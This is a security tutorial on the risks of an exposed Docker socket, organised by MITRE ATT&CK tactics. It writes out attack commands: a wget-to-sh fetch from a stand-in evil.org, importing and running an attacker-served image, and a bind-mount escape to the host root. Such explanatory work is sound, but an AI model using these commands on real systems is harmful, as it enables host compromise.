Why is Exposing the Docker Socket a Really Bad Idea?

It is written almost everywhere: do not expose the Docker socket on Linux! This is followed by the statement that doing so grants root access to the host. But why? What can be done and how? This is what we are about to explore in this article.

We are going to explore the primary means of communication with the Docker daemon (dockerd): the Docker socket. We will show what read and write access to this socket, located at /var/run/docker.sock, can lead to, and use actual examples to emphasize why exposing it is a really bad idea. Everything here applies to Linux only: on Windows and macOS, Docker Desktop manages containers differently.

In the past, the Docker API was exposed over TCP port 2375. Because many of these endpoints ended up reachable from the Internet, which was a serious security issue, the default was changed to a local UNIX socket or a listener bound to localhost.

Nonetheless, you can still find Docker sockets exposed, and there is at least one real-world use case where the Docker socket needs to be mounted in a container: Traefik, the Cloud Native Application Proxy.

UNIX sockets for dummies

UNIX sockets work like network sockets, except that the address used for client-server communication is a path on the file system instead of an IP address and a port. They are used for inter-process communication on the same machine. The same calls as for network sockets, namely connect(), bind(), select(), read() and write(), are used to communicate. The protocol spoken over the socket depends on the server; it can be custom or standard. For instance, the Docker daemon speaks an HTTP-based protocol. Here is an example:

host@host:~$ curl -i -s --unix-socket /var/run/docker.sock -X GET http://localhost/containers/json

HTTP/1.1 200 OK
Api-Version: 1.41
Content-Type: application/json
Docker-Experimental: false
Ostype: linux
Server: Docker/20.10.6 (linux)
Date: Mon, 10 May 2021 07:26:11 GMT
Content-Length: 1714

[{"Id":"4d40a4f865009cbd96aaaf157622959411318af5b5bdc2a16cc661769326d316","Names":["/musing_swartz"],"Image":"alpine","ImageID":"sha256:6dbb9cc54074106d46d4ccb330f2a40a682d49dda5f4844962b7dce9fe44aaec","Command":"/bin/sh","Created":1620631524,"Ports":[],"Labels":{},"State":"running","Status":"Up 46 seconds","HostConfig":{"NetworkMode":"default"},"NetworkSettings":{"Networks":{"bridge":{"IPAMConfig":null,"Links":null,"Aliases":null,"NetworkID":"443b80c6a413c5f40c3c5dd5df0e56064f12a03941ae9f52ce2849d1c7b15cad","EndpointID":"aa45cf2556f1ba86103ffa656242dfcfddb745c74d73ea4d8f10f412c819f063","Gateway":"172.17.0.1","IPAddress":"172.17.0.3","IPPrefixLen":16,"IPv6Gateway":"","GlobalIPv6Address":"","GlobalIPv6PrefixLen":0,"MacAddress":"02:42:ac:11:00:03","DriverOpts":null}}},"Mounts":[]},{"Id":"739f2eaf254f709f8618f642f913cead72e8150220147f2e8c92efb41c415d67","Names":["/angry_shamir"],"Image":"ubuntu","ImageID":"sha256:7e0aa2d69a153215c790488ed1fcec162015e973e49962d438e18249d16fa9bd","Command":"/bin/bash","Created":1620631509,"Ports":[],"Labels":{},"State":"running","Status":"Up About a minute","HostConfig":{"NetworkMode":"default"},"NetworkSettings":{"Networks":{"bridge":{"IPAMConfig":null,"Links":null,"Aliases":null,"NetworkID":"443b80c6a413c5f40c3c5dd5df0e56064f12a03941ae9f52ce2849d1c7b15cad","EndpointID":"bcaaeaccb40a62beb073ebc169691a6143007bd238433eddab9a1cc7da5ffba1","Gateway":"172.17.0.1","IPAddress":"172.17.0.2","IPPrefixLen":16,"IPv6Gateway":"","GlobalIPv6Address":"","GlobalIPv6PrefixLen":0,"MacAddress":"02:42:ac:11:00:02","DriverOpts":null}}},"Mounts":[{"Type":"bind","Source":"/var/run/docker.sock","Destination":"/var/run/docker.sock","Mode":"","RW":true,"Propagation":"rprivate"}]}]

In the above example, we reached the Docker daemon through the socket and asked it to list the containers currently running on the host machine (alpine and ubuntu here). If curl is not available, we can get the same result using socat:

host@host:~$ printf 'GET /containers/json HTTP/1.0\r\n\r\n' | socat - UNIX-CONNECT:/var/run/docker.sock
HTTP/1.0 200 OK
Api-Version: 1.41
Content-Type: application/json
...

This is actually equivalent to the docker ps command, which sends the same request to the Docker daemon but displays less information by default:

host@host:~$ docker ps
CONTAINER ID   IMAGE     COMMAND       CREATED              STATUS              PORTS     NAMES
4d40a4f86500   alpine    "/bin/sh"     About a minute ago   Up About a minute             musing_swartz
739f2eaf254f   ubuntu    "/bin/bash"   About a minute ago   Up About a minute             angry_shamir
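The same request can also be sent from a few lines of Python, without curl, socat or the docker client. This is only a minimal sketch: the function names are made up for illustration, the Host value is arbitrary, and it assumes the daemon closes the connection after answering an HTTP/1.0 request, as in the socat transcript above.

```python
import json
import os
import socket

DOCKER_SOCK = "/var/run/docker.sock"  # default path used throughout the article


def build_request(method: str, path: str) -> bytes:
    """Return a minimal HTTP/1.0 request; the Host value is arbitrary."""
    return f"{method} {path} HTTP/1.0\r\nHost: docker\r\n\r\n".encode("ascii")


def split_response(raw: bytes):
    """Split a raw HTTP response into (status_code, body_bytes)."""
    head, _, body = raw.partition(b"\r\n\r\n")
    status_line = head.split(b"\r\n", 1)[0]  # e.g. b"HTTP/1.0 200 OK"
    return int(status_line.split()[1]), body


def query(path: str, sock_path: str = DOCKER_SOCK):
    """Send a GET over the UNIX socket and return (status, parsed JSON)."""
    with socket.socket(socket.AF_UNIX, socket.SOCK_STREAM) as s:
        s.connect(sock_path)
        s.sendall(build_request("GET", path))
        chunks = []
        while True:  # read until the server closes the connection
            data = s.recv(4096)
            if not data:
                break
            chunks.append(data)
    status, body = split_response(b"".join(chunks))
    return status, json.loads(body)


if __name__ == "__main__":
    if os.path.exists(DOCKER_SOCK):
        try:
            status, containers = query("/containers/json")
            print(status, [c["Names"] for c in containers])
        except (OSError, ValueError) as exc:  # e.g. permission denied
            print("cannot talk to the daemon:", exc)
    else:
        print("no Docker socket at", DOCKER_SOCK)
```

Nothing in this sketch is specific to Docker apart from the socket path and the request path: it is plain HTTP carried over an AF_UNIX stream socket.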

But since the socket is a file, we need the proper permissions to access it:

host@host:~$ ls -al /var/run/docker.sock
srw-rw---- 1 root docker 0 May  5 16:37 /var/run/docker.sock

So, we must either be root or belong to the docker group, which is true for my current user:

host@host:~$ groups fred
fred : fred adm cdrom sudo dip plugdev lxd docker

Last but not least, we are talking to a file, so the URL prefix http://localhost is not really meaningful:

host@host:~$ curl -i -s --unix-socket /var/run/docker.sock -X GET http://google.com/containers/4d40/top
HTTP/1.1 200 OK
...

Obviously, the above request is not querying a container hosted at google.com through the local UNIX socket. We can put a name, an IP address, or almost any illegal string we want in place of the host. This is because curl connects to the UNIX socket whatever the host part says, and the daemon only looks at the path (everything after the protocol and the domain name).

host@host:~$ curl -i -s --unix-socket /var/run/docker.sock -X GET http:/,/containers/json
HTTP/1.1 200 OK
....
host@host:~$ curl -i -s --unix-socket /var/run/docker.sock -X GET http:/8.8.8.8/containers/json
HTTP/1.1 200 OK
....
host@host:~$ curl -i -s --unix-socket /var/run/docker.sock -X GET http:/here-we-put-whatever/containers/json
HTTP/1.1 200 OK
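To see why the host part does not matter, it helps to look at what ends up on the wire. The sketch below is a simplified model of what an HTTP/1.1 client does with a URL (the helper name wire_view is hypothetical): the path goes on the request line, while the host only ends up in the Host header.

```python
from urllib.parse import urlsplit


def wire_view(url: str):
    """Return (request_line, host_header) as an HTTP/1.1 client would send them."""
    parts = urlsplit(url)
    target = parts.path or "/"
    if parts.query:
        target += "?" + parts.query
    return f"GET {target} HTTP/1.1", parts.netloc


for url in ("http://localhost/containers/json",
            "http://google.com/containers/json",
            "http://8.8.8.8/containers/json"):
    print(wire_view(url))
```

The three URLs produce the same request line and differ only in the Host value, which plays no part in choosing the socket that curl connects to.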

The Docker socket

The Docker socket exposes the Docker API. The usual client is the docker command, i.e. the Docker CLI. So let’s look at what happens on the client side when executing docker ps:

host@host:~$ strace -e %net,read,write  docker ps
// Create a socket entity and configure
socket(AF_UNIX, SOCK_STREAM|SOCK_CLOEXEC|SOCK_NONBLOCK, 0) = 3
setsockopt(3, SOL_SOCKET, SO_BROADCAST, [1], 4) = 0
connect(3, {sa_family=AF_UNIX, sun_path="/var/run/docker.sock"}, 23) = 0
getsockname(3, {sa_family=AF_UNIX}, [112->2]) = 0
getpeername(3, {sa_family=AF_UNIX, sun_path="/run/docker.sock"}, [112->19]) = 0
read(3, 0xc00001a000, 4096)             = -1 EAGAIN (Resource temporarily unavailable)
// Test it
write(3, "HEAD /_ping HTTP/1.1\r\nHost: docker\r\nUser-Agent: Docker-Client/20.10.6 (linux)\r\n\r\n", 81) = 81
read(3, "HTTP/1.1 200 OK\r\nApi-Version: 1.41\r\nCache-Control: no-cache, no-store, must-revalidate\r\nContent-Length: 0\r\nContent-Type: text/plain; charset=utf-8\r\nDocker-Experimental: false\r\nOstype: linux\r\nPragma: no-cache\r\nServer: Docker/20.10.6 (linux)\r\nDate: Thu, 06 M"..., 4096) = 280
read(3, 0xc00001a000, 4096)             = -1 EAGAIN (Resource temporarily unavailable)
// Same command as the one we sent with curl
write(3, "GET /v1.41/containers/json HTTP/1.1\r\nHost: docker\r\nUser-Agent: Docker-Client/20.10.6 (linux)\r\n\r\n", 96) = 96
read(3, "HTTP/1.1 200 OK\r\nApi-Version: 1.41\r\nContent-Type: application/json\r\nDocker-Experimental: false\r\nOstype: linux\r\nServer: Docker/20.10.6 (linux)\r\nDate: Thu, 06 May 2021 09:03:06 GMT\r\nContent-Length: 1716\r\n\r\n[{\"Id\":\"4d40a4f865009cbd96aaaf157622959411318af5b5bd"..., 4096) = 1920
read(3, 0xc00001a000, 4096)             = -1 EAGAIN (Resource temporarily unavailable)
// Writing to stdout
write(1, "CONTAINER ID", 12CONTAINER ID)            = 12
...

Looking at what happens on the CLI side when executing the docker ps command, we see the regular operations:

  1. creating a socket with socket();
  2. connecting it to the server via the socket at /var/run/docker.sock;
  3. reading and writing messages.

The important point is that the requests sent to the Docker socket are the same as the ones we sent manually with curl (apart from the API version prefix, /v1.41). We can conclude that the exposed Docker API can be used without the docker client.

The main objects available through the API are containers, images, networks, and volumes, plus a few endpoints related to Docker Swarm. Requests that retrieve or manipulate these objects generally follow the pattern <object>/<id>/<command>. In the next example, we retrieve the list of processes in one of the containers currently running on the host (equivalent to docker top 4d40a4f86500):

host@host:~$ curl -i -s --unix-socket /var/run/docker.sock -X GET http://localhost/containers/4d40a4f865009cbd96aaaf157622959411318af5b5bdc2a16cc661769326d316/top

HTTP/1.1 200 OK
Api-Version: 1.41
Content-Type: application/json
Docker-Experimental: false
Ostype: linux
Server: Docker/20.10.6 (linux)
Date: Thu, 06 May 2021 09:33:47 GMT
Content-Length: 272

{"Processes":[["root","9300","9278","0","07:20","pts/0","00:00:00","/bin/sh"],["root","9333","9300","0","07:20","pts/0","00:00:03","ping google.com"],["root","9334","9300","0","07:20","pts/0","00:00:01","top"]],"Titles":["UID","PID","PPID","C","STIME","TTY","TIME","CMD"]}
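The JSON body is easier to read once each process is paired with the column titles. A small sketch, assuming the body has the Processes/Titles shape shown above (the sample is the response above, shortened to two processes; top_rows is an illustrative name):

```python
import json

# Body of the /top response shown above, shortened to two processes.
TOP_BODY = (
    '{"Processes":[["root","9300","9278","0","07:20","pts/0","00:00:00","/bin/sh"],'
    '["root","9333","9300","0","07:20","pts/0","00:00:03","ping google.com"]],'
    '"Titles":["UID","PID","PPID","C","STIME","TTY","TIME","CMD"]}'
)


def top_rows(body: str):
    """Turn a /containers/<id>/top body into a list of {title: value} dicts."""
    doc = json.loads(body)
    return [dict(zip(doc["Titles"], proc)) for proc in doc["Processes"]]


for row in top_rows(TOP_BODY):
    print(row["PID"], row["CMD"])
```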

Useful tip for the next experiments: we do not have to use the full ID of a container in order to obtain information about it. The server side does not require an exact match: any prefix works as long as it identifies exactly one container (an ambiguous prefix is rejected):

host@host:~$ curl -i -s --unix-socket /var/run/docker.sock -X GET http://localhost/containers/4/top
HTTP/1.1 200 OK
....
{"Processes":[["root","9300","9278","0","07:20","pts/0","00:00:00","/bin/sh"],["root","9333","9300","0","07:20","pts/0","00:00:03","ping google.com"],["root","9334","9300","0","07:20","pts/0","00:00:01","top"]],"Titles":["UID","PID","PPID","C","STIME","TTY","TIME","CMD"]}

The above command gives exactly the same result as the previous one where we specified the full ID. That is because there is only one container starting with character 4 so far and the server knows right away which container we refer to.
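The lookup can be modelled in a few lines. This is a sketch of the observable behavior only, not the daemon's actual implementation: a prefix is usable when it matches exactly one container ID, and anything else is an error. The IDs are the two containers from this article.

```python
IDS = [
    "4d40a4f865009cbd96aaaf157622959411318af5b5bdc2a16cc661769326d316",
    "739f2eaf254f709f8618f642f913cead72e8150220147f2e8c92efb41c415d67",
]


def resolve_prefix(prefix: str, ids):
    """Return the single ID starting with prefix, or raise LookupError."""
    matches = [i for i in ids if i.startswith(prefix)]
    if not matches:
        raise LookupError(f"no such container: {prefix!r}")
    if len(matches) > 1:
        raise LookupError(f"ambiguous prefix: {prefix!r}")
    return matches[0]


print(resolve_prefix("4", IDS)[:12])
print(resolve_prefix("739f", IDS)[:12])
```

With only these two containers on the host, a single character is enough; as soon as another ID starts with 4, the shorter prefix stops being usable.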

Interlude

As we have illustrated in the previous lines, the Docker socket is a direct way to communicate with the Docker daemon running on the host.

Mounting that socket in a container with read and write privileges is equivalent to giving open access to the Docker daemon on the host from inside that container. With this access, one can control the Docker daemon, a process running with effective UID 0. Containers are supposed to be isolated from each other and from the host, so this setup violates the isolation the technology is meant to provide.

Hence, with access to the Docker socket, one can access the host and the other containers. This is what we will describe in the next sections.
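Before going further, it is worth knowing which containers on a host are in this situation. The /containers/json output shown earlier already contains the answer in its Mounts field. A minimal sketch, assuming that output shape (the sample data is trimmed from the listing above, and socket_mounters is an illustrative name):

```python
# Trimmed from the /containers/json listing shown earlier in the article.
CONTAINERS = [
    {"Names": ["/musing_swartz"], "Image": "alpine", "Mounts": []},
    {"Names": ["/angry_shamir"], "Image": "ubuntu", "Mounts": [
        {"Type": "bind", "Source": "/var/run/docker.sock",
         "Destination": "/var/run/docker.sock", "RW": True},
    ]},
]


def socket_mounters(containers, sock="/var/run/docker.sock"):
    """Names of containers whose Mounts include the Docker socket."""
    found = []
    for c in containers:
        for m in c.get("Mounts") or []:
            if m.get("Source") == sock:
                found.append(c["Names"][0].lstrip("/"))
                break
    return found


print(socket_mounters(CONTAINERS))
```

The comparison is on the literal source path, so a socket mounted through another path to the same file (for example /run/docker.sock) would need to be added to the check.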

In the current environment we define:

  • the host, identified by the host@host:~$ prompt;
  • an adversary, identified by the attacker@evil:~$ prompt;
  • an alpine container (4d40a4f86500) with various commands running;
  • an Ubuntu container (739f2eaf254f) with curl and a few other tools installed and the Docker socket mounted at /var/run/docker.sock, started as follows:

host@host:~$ docker run -t -i -v /var/run/docker.sock:/var/run/docker.sock ubuntu /bin/bash

MITRE ATT&CK® matrix for containers with read/write access to an exposed socket

From here, we will use the new (April 2021) MITRE ATT&CK® matrix for containers as a guide to what this configuration can lead to. We will study the impact of an exposed Docker socket with read/write privileges by giving a practical example of at least one technique for each tactic we cover.

Each part below starts with a short reminder or definition of the tactic, quoted from the MITRE matrix, followed by one or more techniques. Some techniques belong to several tactics; we arbitrarily chose where to put them.

Initial access

The adversary is trying to get into your network.

Initial Access consists of techniques that use various entry vectors to gain their initial foothold within a network.

This whole article is based on the hypothesis that we already have access to an exposed Docker socket, either from a remote network, because an admin exposed it, or from inside a container, because the socket is bind-mounted into it for whatever reason. Moreover, we consider the default configuration, for instance without user namespace remapping.

So far, we have only mentioned the Docker socket as a UNIX domain socket, hence local. However, the daemon can also be told to listen on a TCP port. By default, connections to that port are unencrypted and unauthenticated:

host@host:~$ sudo dockerd -H unix:///var/run/docker.sock -H tcp://0.0.0.0:2375
...
host@host:~$ curl http://localhost:2375/containers/json -X GET
[{"Id":"4d40a4f865009cbd96aaaf157622959411318af5b5bdc2a16cc661769326d316","Names":["/musing_swartz"],"Image":"alpine","ImageID":"sha256:6dbb9cc54074106d46d4ccb330f2a40a682d49dda5f4844962b7dce9fe44aaec","Command":"/bin/sh","Created":1620631524,"Ports":[],"Labels":{},"State":"running","Status":"Up 46 seconds","HostConfig":{"NetworkMode":"default"},"NetworkSettings":{"Networks":{"bridge":{"IPAMConfig":null,"Links":null,"Aliases":null,"NetworkID":"443b80c6a413c5f40c3c5dd5df0e56064f12a03941ae9f52ce2849d1c7b15cad","EndpointID":"aa45cf2556f1ba86103ffa656242dfcfddb745c74d73ea4d8f10f412c819f063","Gateway":"172.17.0.1","IPAddress":"172.17.0.3","IPPrefixLen":16,"IPv6Gateway":"","GlobalIPv6Address":"","GlobalIPv6PrefixLen":0,"MacAddress":"02:42:ac:11:00:03","DriverOpts":null}}},"Mounts":[]},{"Id":"739f2eaf254f709f8618f642f913cead72e8150220147f2e8c92efb41c415d67","Names":["/angry_shamir"],"Image":"ubuntu","ImageID":"sha256:7e0aa2d69a153215c790488ed1fcec162015e973e49962d438e18249d16fa9bd","Command":"/bin/bash","Created":1620631509,"Ports":[],"Labels":{},"State":"running","Status":"Up About a minute","HostConfig":{"NetworkMode":"default"},"NetworkSettings":{"Networks":{"bridge":{"IPAMConfig":null,"Links":null,"Aliases":null,"NetworkID":"443b80c6a413c5f40c3c5dd5df0e56064f12a03941ae9f52ce2849d1c7b15cad","EndpointID":"bcaaeaccb40a62beb073ebc169691a6143007bd238433eddab9a1cc7da5ffba1","Gateway":"172.17.0.1","IPAddress":"172.17.0.2","IPPrefixLen":16,"IPv6Gateway":"","GlobalIPv6Address":"","GlobalIPv6PrefixLen":0,"MacAddress":"02:42:ac:11:00:02","DriverOpts":null}}},"Mounts":[{"Type":"bind","Source":"/var/run/docker.sock","Destination":"/var/run/docker.sock","Mode":"","RW":true,"Propagation":"rprivate"}]}]

This makes the Docker daemon reachable on every IPv4 address of the host, through port 2375. We can then send the same requests as before with curl, except that we now have to provide the actual IP address of the machine rather than a dummy host name.
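A quick way to review a daemon command line like the one above is to look at its -H values and keep the TCP listeners that are not bound to the loopback interface. The sketch below is only an illustration: the function name is made up, and it deliberately ignores TLS options, which would change the picture for a TCP listener.

```python
import ipaddress
from urllib.parse import urlsplit


def exposed_listeners(hosts):
    """Return the -H values that listen on TCP beyond the loopback interface."""
    risky = []
    for h in hosts:
        parts = urlsplit(h)
        if parts.scheme != "tcp":
            continue  # e.g. unix:// is a local socket, not a TCP listener
        name = parts.hostname or ""
        try:
            local = ipaddress.ip_address(name).is_loopback
        except ValueError:  # not a literal IP address
            local = name == "localhost"
        if not local:
            risky.append(h)
    return risky


print(exposed_listeners(["unix:///var/run/docker.sock", "tcp://0.0.0.0:2375"]))
```

Applied to the dockerd invocation above, only tcp://0.0.0.0:2375 is reported.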

In April 2020, the Kinsing malware was uncovered. It scanned the Internet for Docker sockets that were accessible and poorly protected. Once it found one, Kinsing started an ubuntu container on the host machine in order to download a cryptominer and then spread it to other containers. Apart from such directly exposed sockets, the Docker socket plays no real role in initial access, which depends instead on the application running in the container.

Execution

The adversary is trying to run malicious code.

Execution consists of techniques that result in adversary-controlled code running on a local or remote system.

What we present first is not a specific technique, just a demonstration of how straightforward it is to run an arbitrary command in any other container.

From inside the Ubuntu container, we can talk directly to the Docker daemon using the mounted socket. Here, we start a new ping in the alpine container from the Ubuntu one. In Docker API terms, this takes two steps: create an exec instance, then start it:

root@739f2eaf254f:/# curl -i -s --unix-socket /var/run/docker.sock -X POST \
  -H "Content-Type: application/json" \
  -d '{"AttachStdin":false, "AttachStdout":true, "AttachStderr":true, "Tty":false, "Privileged":false, "Cmd":["ping","docker.com"]}' \
    http://localhost/containers/4d40/exec

HTTP/1.1 201 Created
...
{"Id":"4c60354e04617c20fa998e3b6dfda05b6bb3a369692eddfaa98d527beae99392"}

root@739f2eaf254f:/# curl -i -s --unix-socket /var/run/docker.sock -X POST \
  -H "Content-Type: application/json" \
  -d '{"Detach": false,"Tty": false}' \
  http://localhost/exec/4c60354e04617c20fa998e3b6dfda05b6bb3a369692eddfaa98d527beae99392/start

HTTP/1.1 200 OK
...

The HTTP code indicates a success, which we can also see by looking at the running processes inside the alpine container:

host@host:~$ docker top 4d40
UID          PID          PPID       C      STIME      TTY      TIME        CMD
root         6796         6746       0      May13      pts/0    00:00:00    /bin/sh
root         50986        6746       0      17:05      ?        00:00:00    ping docker.com
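The two-step exec sequence above can be sketched in Python with nothing but the standard library. The class and function names are illustrative, not part of any Docker SDK. One deliberate difference from the curl transcript: the sketch starts the exec with Detach set to true, so that the call returns immediately instead of streaming the output of a command such as ping.

```python
import http.client
import json
import socket


class UnixHTTPConnection(http.client.HTTPConnection):
    """http.client connection that dials a UNIX socket instead of TCP."""

    def __init__(self, sock_path: str):
        super().__init__("localhost")  # only used for the Host header
        self.sock_path = sock_path

    def connect(self):
        self.sock = socket.socket(socket.AF_UNIX, socket.SOCK_STREAM)
        self.sock.connect(self.sock_path)


def exec_create_request(container: str, cmd):
    """Path and JSON body for step 1: create the exec instance."""
    body = {"AttachStdout": True, "AttachStderr": True, "Tty": False, "Cmd": list(cmd)}
    return f"/containers/{container}/exec", json.dumps(body)


def exec_start_request(exec_id: str):
    """Path and JSON body for step 2: start the exec instance, detached."""
    return f"/exec/{exec_id}/start", json.dumps({"Detach": True, "Tty": False})


def post_json(sock_path: str, path: str, body: str):
    """POST a JSON body over the UNIX socket; return (status, raw body)."""
    conn = UnixHTTPConnection(sock_path)
    try:
        conn.request("POST", path, body=body,
                     headers={"Content-Type": "application/json"})
        resp = conn.getresponse()
        return resp.status, resp.read()
    finally:
        conn.close()


def run_in_container(sock_path: str, container: str, cmd):
    """Create then start an exec instance; return the status of the start call."""
    status, raw = post_json(sock_path, *exec_create_request(container, cmd))
    if status != 201:
        raise RuntimeError(f"exec create failed with HTTP {status}")
    exec_id = json.loads(raw)["Id"]
    status, _ = post_json(sock_path, *exec_start_request(exec_id))
    return status
```

With the environment of this article, run_in_container("/var/run/docker.sock", "4d40", ["ping", "docker.com"]) would correspond to the two curl calls above.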

We can do whatever we want from that Ubuntu container to any other container running on the host thanks to the mounted Docker socket. Instead of a ping, it could be a command like:

>> wget -q -O - --no-check-certificate https://evil.org/x.sh | sh

This would allow an attacker to download and run a script inside the container. See the Container deployment section for details about this scenario.

Container administration command

Adversaries may abuse a container administration service to execute commands within a container. A container administration service such as the Docker daemon, the Kubernetes API server, or the kubelet may allow remote management of containers within an environment.

In the Ubuntu container, we have access to the Docker daemon through the mounted UNIX socket, so of course we can run whatever container administration command we want. We only have to “speak” the right language at the right place.

Here, for instance, we rename the alpine container with ID 4d40 to pwned from inside the Ubuntu container:

#inside the Ubuntu container
root@739f2eaf254f:/# curl -i -s --unix-socket /var/run/docker.sock -X POST \
  -d "name=pwned" \
  -H "Content-Type: application/x-www-form-urlencoded" \
  http://localhost/containers/4d40/rename

HTTP/1.1 204 No Content
...

host@host:~$ docker ps
CONTAINER ID   IMAGE     COMMAND       CREATED        STATUS        PORTS     NAMES
4d40a4f86500   alpine    "/bin/sh"     22 hours ago   Up 22 hours             pwned
739f2eaf254f   ubuntu    "/bin/bash"   22 hours ago   Up 22 hours             heuristic_poitras

This is a simple example, but remember that the Docker socket is the interface to the Docker engine and therefore grants access to its administrative API. The possibilities are everything the Docker API exposes.

Container deployment

Adversaries may deploy a container into an environment to facilitate execution or evade defenses. In some cases, adversaries may deploy a new container to execute processes associated with a particular image or deployment, such as processes that execute or download malware. In others, an adversary may deploy a new container configured without network rules, user limitations, etc. to bypass existing defenses within the environment.

First, as an attacker, suppose we prepare an evil container. For explanation purposes, we simply take an old alpine:2.6 image, and we set up a (fake) web server to serve the resulting image:

attacker@evil:~$ docker pull alpine:2.6
# do whatever you want in a container, then export its filesystem as a tarball (see below)
attacker@evil:~$ docker run -ti alpine:2.6 /bin/sh
/ # vi evil.sh
...
/ # chmod +x evil.sh
/ # ./evil.sh
Hahaha pwned by master of evil containers!
CTRL-p, CTRL-q # Detach from the running container
attacker@evil:~$ docker export 811750df3a31 > evil.tar
# Next, start a very advanced HTTP server
attacker@evil:~$ { printf 'HTTP/1.0 200 OK\r\nContent-Length: %d\r\n\r\n' "$(wc -c < evil.tar)"; cat evil.tar; } | nc -l 8080

Now, let’s move to the Ubuntu container on the targeted host, where we have access to the Docker socket, and try to import that image on this host (yes, we told you that granting access to the Docker socket was a bad idea). We are going to download the tarball as a new image on the host and then deploy a container using this image:

root@739f2eaf254f:/# curl --unix-socket /var/run/docker.sock -X POST   "http://localhost/images/create?fromSrc=http://192.168.1.28:8080/evil.tar&repo=evil%3A13.37"
{"status":"Downloading from http://192.168.1.28:8080/evil.tar"}
{"status":"Importing","progressDetail":{"current":69588,"total":4874240},"progress":"[\u003e                                                  ]  69.59kB/4.874MB"}
{"status":"Importing","progressDetail":{"current":987092,"total":4874240},"progress":"[==========\u003e                                        ]  987.1kB/4.874MB"}
{"status":"Importing","progressDetail":{"current":4067284,"total":4874240},"progress":"[=========================================\u003e         ]  4.067MB/4.874MB"}
{"status":"Importing","progressDetail":{"current":4874240,"total":4874240},"progress":"[==================================================\u003e]  4.874MB/4.874MB"}
{"status":"sha256:4c1cc6c8f6d48b48e41bac270efc05bbb250c401a217555c300085679c7b11af"}

Oops, it seems it worked. Let’s go back to the host to verify that:

host@host:~$ docker images
REPOSITORY            TAG       IMAGE ID       CREATED         SIZE
evil                  13.37     4c1cc6c8f6d4   2 minutes ago   4.5MB
ubuntu                latest    7e0aa2d69a15   6 weeks ago     72.7MB
alpine                latest    6dbb9cc54074   8 weeks ago     5.61MB

Yes!!! Now that we have the image, let’s create the container using this image and execute our malicious evil.sh script from within:

root@739f2eaf254f:/# curl -i -s --unix-socket /var/run/docker.sock -X POST \
  -H "Content-Type: application/json"  \
  -d '{"AttachStdin":true,"AttachStdout":true,"AttachStderr":true,"Tty":true,"OpenStdin":true,"StdinOnce":true,"DetachKeys":"Ctrl-p,Ctrl-q","Cmd":["/bin/sh","-c","/evil.sh"],"Image":"evil:13.37"}' \
  http://localhost/containers/create

HTTP/1.1 201 Created
...
{"Id":"3b8b99805ee2179c8c1b2ad903b51888e82806d194ef093b12a68469d8f39980","Warnings":[]}

The container with prefix 3b8b is now created. However, it is not running yet, so we need to start it:

root@739f2eaf254f:/# curl -i -s --unix-socket /var/run/docker.sock -X POST \
  http://localhost/containers/3b8b/start

HTTP/1.1 204 No Content
...

A status code in the 2xx family means that our request worked: the container has been started on the host. But did our evil.sh script really execute? We can look at the logs on the host:

host@host:~$ docker ps -a | grep 3b8b
3b8b99805ee2   evil:13.37   "/bin/sh -c /evil.sh"   2 minutes ago    Exited (0) 6 minutes ago              eager_bardeen
host@host:~$ docker logs 3b8b
Hahaha pwned by master of evil containers!

And here we are. From inside a container, we downloaded and imported a new image, instantiated a new container from it, and executed a program embedded in the image. In this way, adversary-controlled code was executed on the host.
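The whole deployment boils down to three POST requests. As a recap, the sketch below only builds them and prints them; it sends nothing. The helper names and the <id> placeholder are illustrative, and the create body is reduced to the two fields that matter here (Image and Cmd).

```python
import json
from urllib.parse import urlencode


def import_image_path(tar_url: str, repo: str) -> str:
    """POST target that imports a filesystem tarball as the image `repo`."""
    return "/images/create?" + urlencode({"fromSrc": tar_url, "repo": repo})


def deployment_plan(tar_url: str, repo: str, cmd, placeholder: str = "<id>"):
    """The three POSTs of this section as (path, body) pairs."""
    create_body = json.dumps({"Image": repo, "Cmd": list(cmd)})
    return [
        (import_image_path(tar_url, repo), None),     # 1. import the image
        ("/containers/create", create_body),          # 2. create the container
        (f"/containers/{placeholder}/start", None),   # 3. start it
    ]


plan = deployment_plan("http://192.168.1.28:8080/evil.tar", "evil:13.37",
                       ["/bin/sh", "-c", "/evil.sh"])
for path, body in plan:
    print("POST", path, body or "")
```

The placeholder in the third request stands for the Id returned by the second one (3b8b... in the transcript above).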

Privilege escalation

The adversary is trying to gain higher-level permissions.

Privilege escalation consists of techniques that adversaries use to gain higher-level permissions on a system or network.

This is also quite simple when we have the exposed socket under our control: we will combine a Scheduled Task/Job with Escape to Host. Here is the short description of the latter technique:

Escape to host

Adversaries may break out of a container to gain access to the underlying host. This can allow an adversary access to other containerized resources from the host level or to the host itself. In principle, containerized resources should provide a clear separation of application functionality and be isolated from the host environment.

We will present two techniques to escape to the host: one using a bind mount, one using cgroups.

Escaping to host using a bind mount

With the Docker socket available inside a container, this clear separation is obviously gone. We will start a new container, mount the host root file system in it, and use it to run a command on the host.

In order to achieve that, we are going to do the following:

  1. create a container bind mounting the host file system;
  2. execute the container (run the container);
  3. connect to the new container from our current container;
  4. schedule a cron job on the host since we will have access to the host file system.

To do that, let’s first find what images are available on the targeted host:

root@739f2eaf254f:/# curl --unix-socket /var/run/docker.sock -X GET "http://localhost/images/json"
[
  {"Containers":-1,"Created":1619216497,"Id":"sha256:7e0aa2d69a153215c790488ed1fcec162015e973e49962d438e18249d16fa9bd","Labels":null,"ParentId":"","RepoDigests":["ubuntu@sha256:cf31af331f38d1d7158470e095b132acd126a7180a54f263d386da88eb681d93"],"RepoTags":["ubuntu:latest"],"SharedSize":-1,"Size":72704716,"VirtualSize":72704716},
  {"Containers":-1,"Created":1618427979,"Id":"sha256:6dbb9cc54074106d46d4ccb330f2a40a682d49dda5f4844962b7dce9fe44aaec","Labels":null,"ParentId":"","RepoDigests":["alpine@sha256:69e70a79f2d41ab5d637de98c1e0b055206ba40a8145e7bddb55ccc04e13cf8f"],"RepoTags":["alpine:latest"],"SharedSize":-1,"Size":5613158,"VirtualSize":5613158},
]

We can see two images, including an alpine one, so we base our container on the alpine image already present. This time, when creating the container, we use a bind mount to obtain access to the host file system. We also set the container command to chroot into the mounted host root directory, so that the container process sees the host file system as its own root:

root@739f2eaf254f:/# curl --unix-socket /var/run/docker.sock -X POST \
  -H "Content-Type: application/json"  \
  -d '{"AttachStdin":true, "AttachStdout":true, "AttachStderr":true, "Tty":true, "OpenStdin":true, "StdinOnce":true, "DetachKeys":"Ctrl-p,Ctrl-q", "Cmd":["chroot","/host","/bin/bash"], "Image":"alpine", "Binds":["/:/host"]}' \
   http://localhost/containers/create?name=rootfs

{"Id":"2997eb099cef17b380e86824c172334d4e056554ae7477458fe5cc4506b5167b","Warnings":[]}
